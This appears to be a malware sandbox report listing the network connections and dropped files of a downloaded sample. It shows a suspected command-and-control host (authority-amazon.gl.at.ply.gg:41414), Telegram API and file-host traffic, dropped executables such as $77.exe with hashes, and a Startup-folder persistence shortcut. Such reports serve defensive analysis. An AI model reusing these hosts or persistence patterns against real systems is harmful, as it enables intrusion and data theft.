US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 33.66.178.51.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 s.gofile.io udp
FR 51.75.242.210:443 s.gofile.io tcp
FR 51.75.242.210:443 s.gofile.io tcp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 store1.gofile.io udp
US 8.8.8.8:53 210.242.75.51.in-addr.arpa udp
FR 45.112.123.227:443 store1.gofile.io tcp
FR 45.112.123.227:443 store1.gofile.io tcp
US 8.8.8.8:53 227.123.112.45.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 authority-amazon.gl.at.ply.gg udp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp
US 8.8.8.8:53 18.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp
US 147.185.221.18:41414 authority-amazon.gl.at.ply.gg tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f53207a5ca2ef5c7e976cbb3cb26d870
SHA1 49a8cc44f53da77bb3dfb36fc7676ed54675db43
SHA256 19ab4e3c9da6d9cedda7461efdba9a2085e743513ab89f1dd0fd5a8f9486ad23
SHA512 be734c7e8afda19f445912aef0d78f9941add29baebd4a812bff27f10a1d78b52aeb11c551468c8644443c86e1a2a6b2e4aead3d7f81d39925e3c20406ac1499

\??\pipe\LOCAL\crashpad_1460_EGGUVVXZFHGSRYRP

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ae54e9db2e89f2c54da8cc0bfcbd26bd
SHA1 a88af6c673609ecbc51a1a60dfbc8577830d2b5d
SHA256 5009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af
SHA512 e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 52208df084964b3f3f096b1d0b7124aa
SHA1 7974ee7a887e3e2fdb4969a5a31b2f2df12bb32a
SHA256 bf6944d5f848a9acd90feacf9ff298ff5c2c1c21e454b6abcc99770f34edc16a
SHA512 618532b87efb60b4cbcd9b82b4316c71ce4332c97c2bae5ab5c9a47e421b6d89729d213582457a6ae0ab63f4f2bf7c6fb659943442f0ce45afc347c856fb6586

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\Downloads\Unconfirmed 956282.crdownload

MD5 5273c9f0a68605f043bacdf7a81faecf
SHA1 ca9028398da6f88dafa157bf6b126e2bc8e48f13
SHA256 06527a5d56ce163825bd94e07de31b8bc4e97c44dc006f060c63062fec2db168
SHA512 de4799845318d4f8902b1f1cdfb780382bd796b122acd975eaa7cfad971dba9628c3a7f5403455c5ca4f72cfe8cfbbbde3a68ab8e567f0349ffe9a2c4ff706bd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 863ef0a62d09744f34e64f809023b982
SHA1 f34315d2e719d63f8abdacd93ac0e66be5f575e3
SHA256 f8979dcd6314cb31589d84c58b665facd6c83a1793bc7d9c68a606bcacd32689
SHA512 3a74d7fb1f4e9512c772e67419bf0f433ba1149c1194fa65e40615ef210bebc7b95e01b7de8c79ae3c2529d3ec06de1542fa98562d7f43b75ea2f3e1db1d1c21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0411ad16bea649847357850fd470a9ec
SHA1 475dc19f67d047fd8e344cbe31c7b1f995b5c5ca
SHA256 83d55d906d5866995727fac7313c1c21846df83dfc7b72e11ec6d545431972da
SHA512 90422adf5729c313123b493447219aa3a552f6f7fb3b2b7fae10f168a461b8f64ffc16f067ad283b57cf79e8496c51bef43ccb42bb41202ab7728f39903cdf3c

memory/5164-93-0x000001B984B50000-0x000001B984B72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t0ret4sz.5ub.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 eac98e72b261990fa9e900e1d6da3837
SHA1 8b98be67638235c7fc28038773e8330fe8fb6d88
SHA256 5edf511f2d0cbb631361fae9d202c728e1ee0c610e28098e145b97b75efaccb4
SHA512 b92814882e12be90395ffe51440e343c8bcc2f9b4600bc5ef7e8c12ffb88f973275d1a4f28f53e57f3abc19a48277d003d9002e9fa220a55a808aa394fa7ee78

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 14de68d7a317ad644b6ef887e0182491
SHA1 1ff476a6c3fb9b006e873ba2482865cb9c6caed5
SHA256 bdf1006cd8b92cb88266fa7337f4473dfa40ee27f1ab0e3addab539ad3446783
SHA512 9162b366ed2f17a20456938d3df16c9b7c79c9ff6b063a2cf344807138fc5fba41e9f8c7bc209634cf2ab8464b66c25c3480cd695a0936ce17eb840375831562

memory/5388-121-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-122-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-123-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-127-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-133-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-132-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-131-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-130-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-129-0x000002678E830000-0x000002678E831000-memory.dmp

memory/5388-128-0x000002678E830000-0x000002678E831000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

MD5 19aff7e3b7e3bce2bc35e60f72df0e85
SHA1 cf81454aa5cd0aad035275e64a71bf45b7cb261a
SHA256 f0c875a630f2633efb93d5a66437c6f4894f2da6d5c7ec352115d686a199ce07
SHA512 49b44e20099682b471ae0478c5db73d5b2e76aa1984b30fb95f7590cd636fcbe6dc4b41063882997dcd891ad96936cde56688783a92b07bbe637b6713f56eda0

memory/5844-157-0x00000000008B0000-0x00000000008E4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$77.exe

MD5 6010709a7e1c771b74dbc2602af399f5
SHA1 b417a1d746ddfa7fe039a01bf6b87de60da335cc
SHA256 4352b9094b17df14a12af21dacc67d4b7661ca03f4b1492e847833ff3d77e4b5
SHA512 26538ee5351ca5242b9bbb2bfc6cae661bb2e5c52204109d3cd880505ea618bb8bf248e8b15518ee499bc0c0e87a054ea97c78217b1e91a86c2e2c7348a28d1d

memory/5968-171-0x0000000000DE0000-0x0000000000DF0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 48f8b55d9610e3971015e6a2a586f2c5
SHA1 e33a511543f2a85d6076a84dedabf6fc5c9cf89d
SHA256 fff1a83296dc31250f3e9c54b614c6f85fc44f3effc684173b826eb1b667c2dd
SHA512 5d9b1debeb1260738bb535d85eb7d4321a418b58e36ff658b3dcad564d6b6d8e1bc986efe024c01db8240e012a892627c3a976ecee15fb0d50418a9afa9730f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 316b8ffe7e5dc6add3a2b036e112e675
SHA1 9351953aeb5cb6b82600d45e465872dd60dd2d5c
SHA256 4e419a44acbcda32a59b7b090e6a2e357a84cb78f1fa1f1be79a2ac4245d50ac
SHA512 5fcbe58eea16e157f0d2595a2304e249cb7a3aab5516d58600ef828bb36766d5a149554fbe41ab0bc09df89da9be8538a490599ce02e23ff845053af78bebe4d

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Microsoft.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a115771c01b1507a1846f0dc6687a492
SHA1 c6dd34f87bd8fe6c4af77e9fa02e7b1cf58bd41f
SHA256 a3409692b7dfa70b0f083a5d73230eaaaf55c7c3e74ec5399c5b3f09e05219a5
SHA512 1bc6d51f48aa4e4013378887aa9e0bb91b30e5618bae6c15c45526ba861971c749a0778291d3f5515bfd75626c573d0f3c0110501166e60df176af2fcc89698c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bedb5025bf1eff6f585b07d364e6fdf3
SHA1 14f8df0938b32838135a78f6160577f02475eef1
SHA256 642b0c6cc8ab92c8e2769bed0859a8f80b242f0a7b5c1be7fd53424fd56c2d5b
SHA512 2111544b7f99f12b14547837ebb4f00ec968daa1153a5077de130c849aba63b53e8d23918690b944fec2958ca33a479f306dbac7b9b01b5c6a9c8a3903cccd4a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dd1d0b083fedf44b482a028fb70b96e8
SHA1 dc9c027937c9f6d52268a1504cbae42a39c8d36a
SHA256 cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c
SHA512 96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2c8179aaa149c0b9791b73ce44c04d1
SHA1 703361b0d43ec7f669304e7c0ffbbfdeb1e484ff
SHA256 c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a
SHA512 2e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77.lnk

MD5 7b9c5c3e28db7ebdd3fc80ea9c93be9e
SHA1 bc06ac54e9f5dcb16702ff3c595ce253a5dbe450
SHA256 24d2b087f342f2edfffbecedc430623dd78eaef083536448151d88a8a65f7366
SHA512 70027ab7e28dfea808ac46e94a5b6b3cb00b0f0e06236d45e013db00dd8e779747a3d30b6bb7136077f8b04737b421459b4eaee5e1a608d457d076fcff8824f9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 afc6cddd7e64d81e52b729d09f227107
SHA1 ad0d3740f4b66de83db8862911c07dc91928d2f6
SHA256 b5e81a7c7d80feaaa10ee7bc8aaef9f21a5c1e4b03b3823ed115022311d674a0
SHA512 844edb69585153c378a7c97709983776fc9303a32fb5ef8122ecca32adfc0b265f5ef7118ee07814da5c020ac7ba1bf2a2f66d46312e4d8e6df99aab2e5f9b2a